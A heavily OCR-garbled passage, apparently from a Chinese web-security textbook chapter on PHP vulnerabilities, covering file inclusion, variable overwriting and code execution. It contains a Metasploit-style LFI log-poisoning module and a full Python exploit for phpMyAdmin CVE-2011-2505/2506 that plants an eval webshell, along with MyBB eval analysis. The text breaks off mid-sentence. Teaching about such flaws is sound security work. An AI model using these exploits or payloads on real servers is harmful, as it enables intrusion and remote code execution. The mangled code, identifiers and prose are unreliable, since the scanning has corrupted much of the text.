# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT 
HOLDERS AND CONTRIBUTORS 
# ``AS IS'' AND ANY EXPRESS OR IMPLIED 
WARRANTIES, INCLUDING, BUT NOT LIMITED 
# TO, THE IMPLIED WARRANTIES OF 
MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 
COPYRIGHT HOLDERS OR CONTRIBUTORS 
# BE LIABLE FOR ANY DIRECT, INDIRECT, 
INCIDENTAL, SPECIAL, EXEMPLARY, OR 
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 
LIMITED TO, PROCUREMENT OF 
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 
DATA, OR PROFITS; OR BUSINESS 
# INTERRUPTION) HOWEVER CAUSED AND ON ANY 
THEORY OF LIABILITY, WHETHER IN 
# CONTRACT, STRICT LIABILITY, OR TORT 
(INCLUDING NEGLIGENCE OR OTHERWISE) 
# ARISING IN ANY WAY OUT OF THE USE OF THIS 
SOFTWARE, EVEN IF ADVISED OF THE 
# POSSIBILITY OF SUCH DAMAGE. 
require 'msf/core' 
require 'rex/proto/ntlm/message' 
require "base64" 
class Metasploit3 < Msf::Exploit::Remote 
Rank = ManualRanking 
include Msf::Exploit::Remote: :HttpClient 
def initialize(info = {}) 
super (update_info(info, 


"Name! => ' PHP LFI ', 
'Version' BUS. 
'Description' -» 'This module 


attempts to perform a LFI attack against a 
PHP 
application', 


'Author' => [ 'ghost' ], 
'License' => BSD LICENSE, 
'References' Ed MAN 
'Privileged' -» false, 
'Platform' -» ['php'], 


'Arch' => ARCH PHP, 


'Payload' => 
{ 

# max header length for Apache, 

# http://httpd.apache.org/docs/2.2/ 
mod/core.html#limitrequestfieldsize 

'Space' -» 8190, 

# max url length for some old 
versions of apache according to 

# http://www.boutell.com/newfag/ 
misc/urllength.html 


#'Space' => 4000, 
'DisableNops' => true, 
'BadChars' -»9|'"|, # 


quotes are escaped by PHP's magic quotes gpc 

in 

a default instal 
'Compat 


=> 


'ConnectionType' => 'find', 


}, 
‘Keys! => ['php'], 
}, 
'Targets' => [ ['Automatic' 
SS 
'DefaultTarget' -» 0 
) 


register options( 


Opt: :RPORT(80), 
OptString.new('UserAgent', 
[ true, "The HTTP User-Agent sent in the 
request", 
'Mozilla/4.0 (compatible; MSIE 
6.0; Windows NT 5.1)' ]), 
'method' => 'POST', 
'data' => '«?php '+payload.encoded 
+12>', 
}, 100) 
cleanup() 
if not session created?() 
print status("LFI injection with 9600 
trick") 
res = send request cgi({ 
'agent' -» datastore['UserAgent'], 
'uri' => 
datastore['URI'].gsub("xxLFIxx", "php://input 
%00"), 
'method' => 'POST', 


'data' => '«?php '+payload.encoded 
+12>', 
3, 100) 
cleanup() 
end 
end 


def inject log(logf,agent) 
res = send request cgi(( 
'agent' => agent, 
'uri' => 
datastore['URI'].gsub("xxLFIxx" 
Us efc sw cafus add ides M af es sv SELOgL); 
'method' => 'GET', 
}, 100) 
cleanup() 
return res 
end 
def exploit loginjection 
nullbytepoisoning-false 
injectable-false 
print status("Testing /etc/passwd") 
res - inject log("/etc/ 
passwd",datastore['UserAgent']) 
if res.code »- 200 and res.code «-299 
and res.body=~/sbin\/nologin/ 
print status("log injection without 
null byte poisioning") 
injectable-true 
else 
res - inject log("/etc/passwd 
9690" , datastore['UserAgent']) 
if res.code »- 200 and res.code «-299 
and res.body=~/sbin\/nologin/ 
print status("injection with null 
byte poisioning") 
nullbytepoisoning-true 
injectable=true 
end 
end 
if not injectable 
return false 
end 
print_status("Injecting the webserver 
log files") 
index=0 
logs-datastore['LogFiles'].split(":") 
while not session created?() and index « 
logs.length 
logf-logs[index] 


print status('Trying to poison '+logf) 
if nullbytepoisoning 
logf=logf+"%00" 
end 
inject log(logf,datastore['UserAgent']) 
if res.body-- / 
#{Regexp.escape(datastore ‘User Agent ' D 
print status('Poisoning '*logf*' Via 
the UserAgent') 
= inject log(logf, '<?php 
'*payload.encoded*'?2') 
sleep(30) 
print status("calling the shell") 


res = 
inject log(logf,datastore['UserAgent']) 
end 


index=index+1 
end 


end 
def exploit 
fp=http_ fingerprint() 
print status("Trying generic exploits") 
exploit generic() 
if not session created?() 
print status("Trying OS based 
ico ) 
if ( fp --/unix/i 
print status("Detected a Unix 
server") 
«TODO /proc/self/environ injection 
exploit loginjection() 
# TODO ssh logs injection 
# TODO mail.log maillog injection 
else 


print status("Are they running 
Windows?!?") 


MA httpah BS SC PEU 日 志 目 永 完全 猜 不 到 怎么 办 ? 如 条 PHP 的 错误 
回 显 没有 关闭 ， 那 么 构造 一 些 异 党 也 许 能 够 又 露出 Web 目 孙 所 在 位 置 。 
此 外 ， 还 可 以 利用 下 面 的 方法 。 


A /proc/self/environ xe ~~ 种 更 为 通用 的 方法 ， 因 为 它 根本 不 需要 猜测 
被 包含 文件 的 路 径 ， 同 时 用 户 也 能 控制 它 的 内 容 。 


http://www.website.com/view.php? 
page=../../../../../proc/self/environ 


包含 /proc/self/environ 文 件 ， 可 能 看 到 如 下 内 容 : 


DOCUMENT ROOT-/home/sirgod/public html 
GATEWAY INTERFACE-CGI/1.1 HTTP ACCEPT-text/ 
html, 

application/xml;q-0.9, application/xhtml 
-xml, mane pia; caf peg; image/gif, 
image/x-xbit , */*;q=0. 

HTTP_COOKIE= PHPSESSTD= ANEETA 
4ac2ad7ac 

HTTP. HOST-www.website.com 

HTTP REFERER-http: //www.website.com/ 
index.php?viewz../../../../../../etc/passwd 
HTTP USER AGENT-Opera/9.80 (Windows NT 5.1; 

U; en) Presto/2.2.15 Version/10.00 
PATH-/bin:/usr/bin 

QUERY_STRING=view=. .%2F..%2F..%2F..%2F..%2F.. 
%2Fproc%2Fself%2Fenviron 

REDIRECT_STATUS=200 

REMOTE ADDR-6x.1xx.4x.1xx REMOTE_PORT=35665 


以 上 这 些 方法 ， 都 要 求 PHP 能 够 包含 这 些 文 件 ， 而 这 些 文 件 往 往 都 处 于 
目录 之 外 ， 如 果 PHP 配 置 了 open_basedir， 则 很 可 能 会 使 得 攻击 失 
但 PHP 创 建 的 上 传 临 时 文件 ， (seca dong PHP 人 允许 访问 的 目录 范围 内 。 

含 这 个 临时 文件 的 方法 ， 其 理论 意义 大 于 实际 意义 。 E 


PHP 处 理 上 传 文件 的 过 程 是 这 样 的 ; PHP 处 理 上 传 文件 的 过 程 

PHP 会 为 上 传 文件 创建 临时 文件 ， 其 目录 在 php.ini 的 upload_tmp_dir 中 
定义 。 但 该 值 默认 为 空 ， 此 时 在 Linux 下 会 使 用 /tmp 目 录 ， 在 Win-dows 
下 会 使 用 Ci:\windows\temp 目 录 。 

该 临时 文件 的 文件 名 是 随机 的 ， 攻 击 者 必须 准确 猜测 出 该 文件 名 才能 
成 功利 用 漏洞 。PHP 在 此 处 并 没有 使 用 安全 的 随机 函数 ， 因 此 使 得 骏 力 
崩 解 文件 名 成 为 可 能 。 在 Windows 下 ， 仅 有 65535 种 不 同 的 文件 名 。 
Gynvael Coldwind i RA MR Sik VR, JF T paper: PHP LFI to 
arbitratry code execu-tion via rfc1867 file upload temporary files ， 有 兴趣 


的 读者 可 以 参考 此 文 。 


14.2 EET 

14.2.1 全 局 变量 覆盖 

变量 如 果 未 被 初始 化 ， 且 能 被 用 户 所 控制 ， 那 么 很 可 能 会 导致 安全 问 
题 。 而 在 PHP 中 ， 这 种 情况 在 register_globals 为 ON 时 尤其 严重 。 

在 PHP 4.2.0 之 后 的 版 本 中 ，register_globals 默 认 由 ON 变 为 了 OFF。 这 在 
当时 让 很 多 程序 员 感 到 不 适应 ， 因 为 程序 员 习 惯 了 滥用 变量 o PHP 中 使 
用 变量 并 不 需要 初始 化 ， 因 此 register_globals= Ses 变量 来 源 可 能 是 
各 个 不 同 的 地 方 ， 比 如 页 面 的 表单 、Cookie 等 。 这 样 极 容易 写 出 不 安 
全 的 代码 ， 比 如 下 面 这 个 例子 : 


«?php 
echo "Register. globals: 
(int )ini_get("register_ globals" )."«br/» 
if (Saut h){ 
echo "private!" 


?> 


“register_globals = OFF 时 ， 这 段 代码 并 不 会 出 问题 。 测 试 页 面 
€ Q Owe. a. con/testl. php?auth=1 
Register_globals: 0 


Notice: Undefined variable: auth in D:\soft\develop\env\sites\www. a. com\testl. php on line 11 


但 是 当 register globals = ON 时 , fe X 请 XK URL 
http://www.a.com/test1.php?auth=1, 2 s¢$auth B ots SI VE: 
€ C Ownw.a. con t ; 


is oe globals: 1 


从 而 导致 发 生 安全 问题 。 
类 似 的， 通过 $GLOBALS 获 取 的 变量 ， 也 可 能 导致 变量 履 震 。 假 设 有 
如 下 代码 : 


<?php 

echo "Register globals: ". 

(int)ini get("register globals")."«br/»"; 
if (ini get('register globals')) 
foreach($ REQUEST as $k=>$v) unset($($k)); 
print $a; 

ae $_GET[b]; 


we Ex à DLA SS Fregister globals]f V f : 


if (ini get('register globals')) 
foreach($ REQUEST as $k=>$v) unset($($k)); 


Besar NIBIL, TEregister globals = ON 时 ， 青 尝试 控制 “$a* 的 值 ， 
KJ 文 段 葵 用 代码 而 出 错 。 


提交 : http://www.a.com/test1.php?a=1&b=2 


€ C | Q www.a. con/ testi. php?a-1&b-2 
Register globals: 1 
Notice: Undefined variable: a in D:\soft\develop\env\sites\www. : 


Notice: Use of undefined constant b - assumed 'b' in D:\soft\devel 
2 


显示 变量 a 未 定义 

而 当 堂 试 注入 “GLOBALS[a]” 以 覆盖 全 局 变量 时 ， 则 可 以 成 功 控制 变 
量 “$a” 的 值 。 

提交 : http://www.a.com/test1.php?GLOB-ALS[a]=1&b=2 


€ Q | Quim. a. con/ testi. php?GLOBALS [a]21&b-2 


Register globals: 1 


1 
Notice: Use of undefined constant b - assumed 'b' in D:\soft\develop\env\sit 


2 

示 变 量 a 的 值 
这 是 因为 unset0 默 认 只 会 销 abe ss, BRS Seale 
$GLOBALS ° FE: 


«?php 
function foo() { 
unset($GLOBALS['bar']); 


} 

$bar = "something"; 
foo(); 

?» 


而 在 register_globals = OFF 时 ， 则 无 法 覆盖 到 全 局 变量 。 

€ > Q Qn. a. con/testi. php?GLOBALS [a]-1&b-2 

Register globals: 0 

Notice: Undefined variable: a in D:\soft\develop\env\sites\wew. a. com\test1. php í 
Norkees Use of undefined constant b - assumed 'b in D:\soft\develop\env\sites\wayr 
显示 变量 a 未 定义 


所 以 如 果实 现代 码 关 闭 register_globals ， 则 一 定 要 履 盖 所 有 的 
superglobals， 推 荐 使 用 下 面 的 代码 : 


<?php 
// Emulate register_globals off 
function unregister_GLOBALS() 


if (!ini get('register globals')) { 
return; 


} 


// Might want to change this perhaps to 
a nicer error 
if (isset($ REQUEST['GLOBALS']) || 
isset($ | nice al GLOBALS' 
e('GLOBALS overwrite attempt 
detected, Ys 


// Variables that shouldn't be unset 
$noUnset = array(' rcr ' GET 


' POST', COOKIE’, 

, “request”, a, 

Ey _FILES'); 

$input = array merge(s. GET, $ POST, 
COOKIE, $ SERVER, 

Hg ENV, $ FILES 


isset($ SESSION) && 
is array($ SESSION) ? $ SESSION : array()); 
foreach ($input as $k => $v) { 
if (!in_array($k, $noUnset) && 
isset($GLOBALS[$k])) { 
unset ($GLOBALS[$k]); 


} 
} 


} 
unregister GLOBALS(); 
> 


这 在 共享 的 PHP 环 境 中 (比如 App Engine) 可 能 会 比较 有 用 。 
回 到 变量 覆盖 上 来 ， 即 便 变 量 经 过 了 初始 化 ， 但 在 PHP 中 还 是 有 很 多 方 
式 可 能 导致 变量 覆盖 。 当 用 户 能 够 控制 变量 来 源 时 ， 将 造成 一 些 安全 
隐患， 严重 的 将 引起 XSS 、 SQL 注 入 等 攻击 ， 或 者 是 代码 执行 。 
14.2.2 extract) SEBS 
extract() NACHE 将 变量 从 数组 导入 当 前 的 符号 表 ， 其 函数 定义 如 下 ; 


int extract ( array $var_array [, 
$extract type [, string $prefix H r 


其 中 ， 第 二 个 参数 指定 函数 将 变量 导入 符号 表 时 的 行为 ， 最 常见 的 两 

个 值 是 “EXTR_OVER-WRITE” 和 “EXTR_SKIP”。 

当 值 为 "EXTR_ OVERWRITE” 时 ， 在 将 变量 导入 符号 表 的 过 程 中 ， 如 果 
Bee SESE, MARCATE; 值 为 "EXTR_ SKIP” 则 表示 跳 过 不 

7B x o E ow — 7 X AU RE, UuUp dk SAGA BOP [e 

Fi*EXTR. OVERWRITE" ° 


看 如 下 代码 : 


$auth = '0'; 

extract($ GET); 

if ($auth == 1){ 
echo "private!"; 

jelse { 


echo "public!"; 


?> 


当 extract() 汞 数 从 用 尸 可 以 控制 的 数组 中 导出 变量 时 ， 可 能 发 生变 量 履 
盖 。 在 这 个 例子 里 ，ex-tract() 从 $_GET 中 导出 变量 ， 从 而 可 以 导致 任意 
DICT. 。 假设 用 户 构造 以 下 链接 ; 


http://www.a.com/test1.php?auth=1 


将 改变 变量 $auth 的 值 ， IRA i ER. ° 


"m 


一 种 较为 安全 的 做 法 是 确定 register_globals= OFF 后 ， 在 调用 extract0 时 

使 用 EXTR_SKIP 保 证 已 有 变量 不 会 被 窗 盖 。 但 extract() 的 来 源 如 果 能 

被 用 户 控制 ， 则 仍然 是 一 种 非常 糟糕 的 使 用 习惯 。 同 时 还 要 留意 变量 

获取 的 顺序 ， 在 PHP 中 是 由 php.ini 中 的 variables_order 所 定义 的 顺序 来 获 

取 变 量 的 。 

类 似 extract0)， 下 面 几 种 场景 也 会 产生 变量 履 盖 的 问题 。 

14.2.3 ”遍历 初始 化 变量 

eS ee HJüÉZ SUEDE EL 
H: 


$chs = ''; 
if($ POST && $charset != 'utf-8') { 
$chs - new Chinese('UTF-8' 


foreac h($ POST as $key => $value) { 
$$key = $chs- 
>Convert ($value); 


A fe 2B BNchs, lll nl ee E“ $chs” AVE ° 

LETRAS BT IY Fs BE BSS NS SVE TA eB BAS 
量 ， 从 而 导致 一 些 不 可 控制 的 结果 。 

14.2.4 import request variables EET zz 


bool import request variables ( string 
$types [, string $prefix ] ) 


import. request. variables() f GET ` POST 、Cookie 中 的 变量 导入 到 全 
局 ， 使 用 这 个 函数 只 需要 简单 地 指定 类 型 即 可 。 其 中 第 二 个 参数 是 为 
SAWS BSI BIZ, WRIA Tare, MN tte aye et ° 


import request variables('6'); 
if ($auth == 1){ 
"private!"; 


以 上 代码 中 ，import_request_variables('G'") 指 十 导 入 GET 请 求 中 的 变量 ， 
Afi Se SE EET ns In] ail © 


14.2.5 parse str() P EE TRE x 


void parse str ( string $str [, array & 
$arr ] ) 


parse strO EK AU E (E88 A FT URLA query string， 但 是 当 参 数值 能 被 
FAP PAY, (RRISESEUE ETE ^ 
类 似 下 面 的 写法 都 是 危险 的 : 


//var .php?var-new 变量 覆盖 

parse str (3 SERVER ' QUERY. STRING! ]); 
如 果 指 定 了 parse_str0 的 第 二 个 参数 ， 则 会 将 query string 中 的 变量 解析 
后 存 入 该 数组 变量 中 。 因 此 在 使 用 parse_str0 时 ， 应 该 养 成 指定 第 二 个 
参数 的 好 习惯 。 
与 parse_str0 类 似 的 函数 还 有 mb_parse_str0。 
还 有 一 些 变量 覆盖 的 方法 ， 难 以 一 次 列 人 全， 但 有 以 下 安全 建议 : 
自 完 ， 确 你 register_globals =OFF。 大 不 能 目 定义 php.ini， 则 应 该 在 代码 
中 控制 。 
其 次 ， 熟 悉 可 能 造成 变量 履 盖 的 了 画 数 和 方法 ， 检 查 用 户 是 否 能 控制 变 
量 的 来 源 。 
最 后 ， 养 成 初始 化 变量 的 好 习惯 。 


14.3 ”代码 执行 漏洞 

PHP 中 的 代码 执行 情况 非常 灵活 ， 但 完 其 原因 仍然 离 不 开 两 个 关键 条 
件 : 第 一 是 用 户 能 够 控制 的 函数 输入 ; 第 二 是 存在 可 以 执行 代码 的 危 
险 函 数 。 但 PHP 代 码 的 执行 过 程 可 能 是 曲折 的 ， 有 些 问题 很 隐蔽 ， 不 
易 被 发 现 ， 要 找 出 这 些 问 题 ， 对 安全 工程 师 的 经 验 有 和 较 高 的 要 求 。 
14.3.1 “ERTER BC BUT AE 

TEBU X PES, SCR esa x n] DOR CIS UT AY © [BTEPHP P, 
能 够 执行 代码 的 方式 远 不 止 文件 包含 漏洞 一 种 ， 比 如 危险 函数 
popen()、sys-tem()、passthru()、exec() 等 都 可 以 直接 执行 系统 命令 。 此 
外 ，eval0 函 数 也 可 以 执行 PHP 人 代码。 还 有 一 些 比较 特殊 的 情况 ， 比 如 
允许 用 户 上 传 PHP 代 码 ， 或 者 是 应 用 写 入 到 服务 吉 的 文件 内 容 和 文件 
类 型 可 以 由 用 户 控制 ， 都 可 能 导致 代码 执行 。 

BOBO M 来 帮助 深入 理解 PHP 中 可 能 存在 的 代码 执行 
iii. ? 

14.3.43. phpMyAdmin 3.4.3.1 远 程 代码 执行 漏洞 

在 phpMyAdmin 版 本 3.3.10.2 与 3.4.3.1 以 下 存在 一 个 变量 覆盖 漏洞 ， 漏 
i] 编号 为 : CVE-2011-2505 , 漏洞 代码 存在 于 
libraries/auth/swekey/swekey.auth.lib.php 中 。 


(strste(S_SERVER| ' QUERY. STRING'], 'session_to_ 
i ) != false) 

ee ee t 

session id(Ssession to unset); 

M ru M 

ie cuu 
j Tt; 

这 是 一 个 典型 的 通过 parse_str0 覆 盖 变 量 的 漏洞 ， 但 是 这 个 函数 的 逻辑 
很 短 ， 到 最 后 直接 束 exit 了 ， 原本 做 不 了 太 多 事情 。 但 是 注意 到 
Session 变 量 是 可 以 保存 在 服务 需 端 ， 并 利 驻 内 存 的 ， 因 此 通过 履 兰 
$_SESSION 变 量 将 改变 很 多 逻辑 。 
原本 程序 逻辑 执行 到 Session_destroy0 将 正常 销毁 Session， 但 是 在 此 之 
前 session_write_close0 已 经 将 Session 保 存 下 来 ， 然 后 到 session_id0O 处 
试图 切换 Session ° 
这 个 漏洞 导致 的 后 果 ， 就 是 所 有 从 Session 中 取出 的 变量 都 将 变 得 不 再 
可 信任 ， 可 能 会 导致 很 多 XSS、SQL 注 入 等 问题 ， 但 我 们 直接 看 由 
CVE-2011-2506 导 致 的 静态 代码 注入 一 一 


f£setup/lib/ConfigGenerator.class.php +: 


ye 
* Creates config file 


* 


* @return string 


EF 
public static function getConfigFile() 
{ 
$cf = ConfigFile::getInstance(); 
$crlf = (isset($ SESSION['eol']) && 
$ SESSION['eol'] == 'win') ? "NrNn" : "An"; 
$c - $cf-»getConfig(); 
// header 
$ret = '«?php' . $crlf 
a UPC SOG ET 


. ' * Generated configuration 
file' . $crlf 
' * Generated by: phpMyAdmin ' 
. $GLOBALS['PMA Config']- 
>get ('PMA_VERSION' ) 
' setup script' . $crlf 
p yae Datei” 
date(DATE RFC1123) . $crlf 
obo S = A e 1 $orlf; 
// servers 
if ($cf->getServerCount() > 0) { 
$ret .- "/* Servers 
configuration */$crlfN$i = 0;" . $crlf . 
$crlf; 
foreach ($c['Servers'] as $id => 
$server) { 
$ret .= '/* Server: ' . 
strtr($cf->getServerName($id), '*/', '-') 
" [$id] */" . $crlf 
'$i++;' . $crlf; 
foreach ($server as $k => 
$v) { 
$k = preg replace('/[^A- 
Za-z0-9 ]/', '_', $k); 
$ret .= "\$cfg['Servers'] 
[\$i] ['$k'] = " 
(is_array($v) && 
self: :_isZeroBasedArray($v) 
2 


self: :_exportZeroBasedArray ($v, $crlf) 


var export($v, true)) 


's! v. $crlf; 
} 
$ret .= $crlf; 
} 
$ret .= '/* End of servers 
configuration */' . $crlf . $crlf; 


unset($c['Servers']); 
// other settings 
$persistKeys = $cf- 
>getPersistKeysMap(); 
foreach ($c as $k => $v) { 
$k = preg replace('/[^A-Za- 
z0-9 ]/', ' ', $k); 
$ret .= self:: getVarExport($k, 
$v, $crlf); 
if (isset($persistKeys[$k])) { 
unset ($persistKeys[$k]); 
} 


// keep 1d array keys which are 
present in $persist_keys (config.values.php) 
foreach (array_keys($persistKeys) as 
$k) { 
if (strpos($k, '/') === false) { 
$k = preg replace('/[^A-Za- 
z0-9 ]/', ' ', $k); 


$ret .- 
self:: getVarExport($k, $cf-»2getDefault($k), 
$crlf); i 
Pae eh tiata 
return $ret; 
} 
其 中 ， 此 处 试图 在 代码 中 添加 注释 ， 但 其 拼接 的 是 一 个 变量 : 
$ret .- '/* Server: ' . strtr($cf- 
>getServerName($id), '*/', '-') . " [$id] 
*/" , $crlf 


Ws ER ce, strir) KE e T 35 E $cf->getServerName($id) , 
防止 该 值 中 包含 有 */， 从 而 关闭 注释 符 ， 然 而 ， 紧 随 其 后 的 [$id] 却 未 


做 任何 处 理 ， 它 实际 上 是 数组 变量 $c['Servers'] 的 key。 
变量 $c 则 是 函数 返回 的 结果 : $c = $cf->get-Config(); 
在 libraries/config/ConfigFile.class.php 中 有 getConfig() 的 实现 : 


yee 
* Returns configuration array (full, 
multidimensional format) 
* 


* Qreturn array 
ud 
public function getConfig() 


$c = $_SESSION[$this->id]; 
foreach ($this->cfgUpdateReadMapping as 
$map_to => $map_from) { 
PMA_array_write($map_to, $c, 
PMA_array_read($map_from, $c)); 
A array remove($map from, $c); 


} 
return $c; 


最 终 发 现 $c 是 从 Session 中 取得 的 ， 而 我 们 通过 前 面 的 漏洞 可 以 覆盖 
Session 中 的 任意 变量 ， 从 而 控制 变量 $c， 最 终 注 入 “*/”* 闭 合 注 释 符 ， 
将 PHP 代 码 插 入 到 config/config.inc.php 中 并 执行 。 

此 漏洞 的 利用 条 件 是 config 目 录 人 存在 并 可 写 ， 而 很 多 时 候 管理 员 可 能 
会 在 完成 初始 化 安装 后 ， 删 除 config 目 录 。 

内 安全 人 研究 者 wofeiwo 为 此 漏洞 写 了 一 段 POC: 


#!/usr/bin/env python 
# coding-utf-8 
# pma3 - phpMyAdmin3 remote code execute 
exploit 
4 Author: wofeiwo<wofeiwo@80sec.com> 
# Thx Superhei 
# Tested on: 3.1.1, 3.2.1, 3.4.3 
# CVE: CVE-2011-2505, CVE-2011-2506 
# Date: 2011-07-08 
# Have fun, DO *NOT* USE IT TO DO BAD THING. 
DASS 
HHH 
# Requirements: 1. "config" directory must 
created&writeable in pma directory. 
# 2. session.auto_start = 1 
in php.ini configuration. 
import os,sys,urllib2,re 
def usage(program): 
print "PMA3 (Version below 3.3.10.2 and 
3.4.3.1) remote code 
execute exploit" 
print "Usage: %s «PMA url»" % program 


print "Example: %s http://www.test.com/ 
phpMyAdmin" % program 

sys.exit(0) 
def main(args): 


ry: 
if len(args) « 2: 
usage(args[9]) 
if args[1][-1] == "7": 
args[1] = args[1][:-1] 
print "[+] Trying get form 
token&session id.." 
content = urllib2.urlopen(args[1]+"/ 
index.php").read() 
ri = re.findall("token=(\w{32})", 
content) 
r2 = 
re.findall("phpMyAdmin-(Nw(32,40))", content) 
if not r1: 
r1 = re.findall("token\" value= 
\"(\w{32})\"", content) 
if not r2: 
r2 = re.findall("phpMyAdmin\" 
value=\"(\w{32,40})\"", content) 
if len(r1) < 1 or len(r2) < 1: 
print "[-] Cannot find form 
token and session id...exit." 
sys.exit(-1) 
token = r1[0] 


sessionid = r2[0] 

print "[+] Token: %s , SessionID: 
96s" % (token, sessionid) 

print "[+] Trying to insert payload 
in $_SESSION..' 

uri = "/libraries/auth/swekey/ 
swekey.auth.1lib. php? 
session_to_unset=HelloThere&_ 
SESSION [ConfigFile0][Servers][*/ 
eval(getenv( 'HTTP_CODE'));/*] [host ]=Hacked+By 
+PMA&_ 
SESSION[ConfigFile] [Servers] [*/ 
eval(getenv('HTTP CODE'));/*][host]-Hacked-*By 
*PMA" 


url = args[1]+uri 
opener - urllib2.build opener() 
opener.addheaders.append(('Cookie', 
'phpMyAdmin-*s; 
pma lang-en; 
pma mcrypt iv-ILXfl5RoJxQX93D; PHPSESSID- 
96S; ' 96 
(sessionid, sessionid))) 
urllib2.install opener(opener) 
urllib2.urlopen(url) 
print "[+] Trying get webshell.." 
postdata ="phpMyAdmin= 
%s&tab_hash=&token= 
%sS&check_page_refresh=&DefaultLang 
=en&Server 
Default=0&eol=unix&submit_save=Save" 
% (sessionid, token) 
url = args[1]+"/setup/config.php" 
# print "[+]Postdata: %s" % postdata 
urllib2.urlopen(url, postdata) 
print "[+] All done, pray for your 
lucky!" 
url = args[1]+"/config/ 
config.inc.php" 
opener .addheaders.append(('Code', 
"phpinfo();')) 
urllib2.install_opener (opener) 
print "[+] Trying connect shell: %s" 
% url 
result = re.findall("System \</td\> 
N«td class=\"v\"\>(.*)\</td\>\</tr\>", 
urllib2.urlopen(url).read()) 
if len(result) -- 1: 
print "[+] Lucky u! System info: 
9:s" 96 result[0] 
print "[+] Shellcode is: 
eval(getenv('HTTP CODE'));" 
else: 
print "[-] Cannot get webshell." 
except Exception, e: 


print e 
if name == " gain " : main(sys.argv) 
关键 代码 十 
uri = "/libraries/auth/swekey/ 


swekey.auth.lib.php? 

session to unset-HelloThere& 
SESSION[ConfigFileo] 

[Servers] [*/eval(getenv('HTTP CODE'));/*] 
[host ]=Hacked+By+PMA&_SESSION[ConfigFile] [Se 
rvers][*/eval(getenv('HTTP CODE'));/*] 

[host ]=Hacked+By+PMA" 


"ETE" evalQ/ TE AS 278 GH SESSIONS BiJkey'# ° 

14.3.1.2 MyBB 1.4 远 程 代 码 执行 漏洞 

接 下 来 看 男 外 一 个 案例 ， 这 是 一 个 间接 控制 eval0 玉 数 输入 的 例子 。 这 
是 由 安全 研究 者 fyh4t 发 现 的 一 个 漏洞 : MyBB 1.4 admin remote 
codeexecution vulnerability ° 


自 完 ， 在 MyBB 的 代码 中 存在 eval() KZ ° 


//index.php，336 行 左右 
$plugins-»run hooks("index end"); 
// 出 现 了 eval 画 数 ， 注 意 参 数 
eval("\$index = \"".$templates- 
»get("index")."V";"); 

output page($index); 


挖掘 漏洞 的 过 程 ， XE Fis tro Be FC EB f ES ER RC, 然后 回溯 函数 的 调用 过 
程 ， 最 终 看 在 整个 调用 的 过 程 中 用 户 是 否 有 可 能 控制 输入 。 

可 以 看 到 eval0 的 输入 来 目 于 $templates->get("index"， 继 续 找 到 此 函数 
的 定义 : 


$htmlcomments=1) 


{ 
global $db, $theme, $mybb; 
// 


// DEVELOPMENT MODE 
// 
if($mybb-»dev mode == 1) 
$template = $this- 
>dev_get ($title); 
if($template !== false) 
$this->cache[$title] = 
$template; 


} 
if(!isset($this->cache[$title])) 
{ 


$query = $db- 
>simple_select("templates", "template", 
"title-'".$db- 


>escape_string($title)."' 
AND sid IN ('-2','-1','" 
$theme['templateset']."')", 
array('order_by' => 'sid', 
'order dir' => 'DESC', 'limit' => 1)); 
// 从 数据 库 里 面 取出 模板 的 代码 
$gettemplate = $db- 
»fetch array($query); 
if($mybb-»debug mode) 


t 
$this- 
>uncached_templates[$title] = $title; 


if(!$gettemplate) 
$gettemplate['template'] - 
} 
$this->cache[$title] = 
$gettemplate['template']; 


$template = $this->cache[$title]; 
if ($htmlcomments) 


if ($mybb- 
>settings['tplhtmlcomments'] == 1) 
{ 


$template = "<!-- start: 


",htmlspecialchars uni($title)." --> 
\n{$template}\n 
<!-- end: 

".htmlspecialchars uni($title)." -->"; 

} 
else 


$template = 
"\n{$template}\n"; 
} 
} 
if ($eslashes) 
{ 


$template = str_replace("\\'", 
"'", addslashes($template)); 


F 
return $template; 


} 


原来 get0 函 数 获 得 的 内 容 是 从 数据 库 中 取出 的 。 取 出 时 经 过 了 一 些 安 
全 处 理 ， 比 如 addslashes()， 那 么 数据 库 中 的 内 容 用 户 是 否 能 控制 呢 ? 
根据 该 应 用 的 功能 ， 不 难看 出 这 完全 是 用 户 提交 的 数据 。 


//admin/modules/style/templates.php，372 行 开始 
if($mybb->input['action'] == "edit template") 


t 
$plugins- 
»run hooks("admin style templates edit templa 


te"); 
if(!$mybb-»input['title'] || !$sid) 
{ 


flash_message($lang- 
>error_missing_input, 'error'); 

admin redirect("index.php? 
module-style/templates"); 


} 
if($mybb-»request method == "post") 
if (empty($mybb->input['title'])) 


$errors[] = $lang- 
>error_missing_title; 


if(!$errors) 


$query = $db- 
>simple_select("templates", "*", 
"tid='{$mybb->input['tid']}'"); 
$template = $db- 
>fetch_array($query) ; 
// 获 取 到 我 们 输入 的 内 容 ， 包 括 模板 
的 标题 和 内 容 


$template array = array( 
'title' -» $db- 
>escape_string($mybb->input['title']), 
'sid' => $sid, 
'template' => 
$db- 
>escape_string(trim($mybb- 
>input['template'])), 
'version' => $mybb->version_code, 
"Status' => '', 
'dateline' => TIME NOW 
i 
// Make sure we have the correct 
tid associated with this template. If the 
user double submits then the tid 
could originally be the master template 
tid, but because the form is 
sumbitted again, the tid doesn't get updated 
to 
the new modified template one. 
This then causes the master template to 
be overwritten 
$query = $db- 
>simple_select("templates", "tid", 
"title-'".$db- 
>escape_string($template['title'])."' 
AND (sid = '-2' OR sid = 
'($template['sid'])')", 
array('order by' => 'sid', 
'order dir' => 'desc', 'limit' => 1)); 
$template['tid'] = $db- 
>fetch_field($query, "tid"); 
if($sid > 0) 


// Check to see if it's 
never been edited before (i.e. master) of if 

this a new template (i.e. 
we've renamed it) or if it's a custom 


template 

$query = $db- 
>simple_select("templates", "sid", 

"title='".$db- 
>escape_string($mybb->input['title'])."' 

AND (sid = '-2' OR sid = 


'($sid)' OR sid='{$template['sid']}')", 
array('order_by' => 
'sid', 'order dir' => 
'desc')); 
$existing sid = $db- 
>fetch_field($query, "sid"); 
$existing rows = $db- 
»num rows($query); 


// 更 新 模板 数据 库 
if(($existing_sid == -2 && 
$existing_rows == 1) || $existing_rows == 0) 
$tid = $db- 
>insert_query("templates", $template array); 
else 
$db- 


>update_query("templates", $template_array, 


"tid='{$template['tid']}' AND sid != '-2'"); 
} 


} 


通过 编辑 模板 功能 可 以 将 数据 写 入 数据 库 ， 然 后 通过 调用 前 台 文件 使 
